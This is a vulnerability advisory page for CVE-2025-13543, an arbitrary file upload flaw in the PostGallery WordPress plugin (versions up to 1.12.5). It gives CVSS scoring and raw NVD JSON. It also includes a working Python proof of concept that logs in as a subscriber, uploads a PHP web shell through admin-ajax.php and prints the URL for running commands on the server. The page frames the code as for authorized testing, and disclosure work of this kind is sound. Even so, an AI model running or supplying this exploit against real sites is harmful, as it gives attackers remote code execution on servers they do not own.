Security Vulnerability Report
中文
CVE-2025-13543 CVSS 8.8 HIGH

CVE-2025-13543

Published: 2025-12-04 21:16:08
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The PostGallery plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the 'PostGalleryUploader' class functions in all versions up to, and including, 1.12.5. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PostGallery插件所有 <= 1.12.5 版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13543 PoC - PostGallery Arbitrary File Upload # Target: WordPress site with PostGallery plugin <= 1.12.5 target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' username = sys.argv[2] if len(sys.argv) > 2 else 'subscriber' password = sys.argv[3] if len(sys.argv) > 3 else 'password' # Login to WordPress session = requests.Session() login_url = f'{target}/wp-login.php' login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f'{target}/wp-admin/', 'testcookie': '1' } session.post(login_url, data=login_data) # Upload malicious PHP file via PostGallery uploader upload_url = f'{target}/wp-admin/admin-ajax.php' files = { 'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/php') } data = { 'action': 'post_gallery_upload', 'post_id': '1' } try: response = session.post(upload_url, files=files, data=data) print(f'Status Code: {response.status_code}') print(f'Response: {response.text}') # If upload successful, try to access the shell if response.status_code == 200 and 'upload' in response.text.lower(): print('[+] File uploaded successfully!') print('[+] Access shell at: ' + target + '/wp-content/uploads/post-gallery/shell.php?cmd=whoami') except Exception as e: print(f'[-] Error: {e}') print('\n[!] Note: This PoC is for educational and authorized testing purposes only.')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13543", "sourceIdentifier": "[email protected]", "published": "2025-12-04T21:16:08.037", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PostGallery plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the 'PostGalleryUploader' class functions in all versions up to, and including, 1.12.5. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/postgallery/tags/1.12.5/admin/PostGalleryUploader.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/13348eb5-5001-4ec4-bc6a-44795bbed203?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.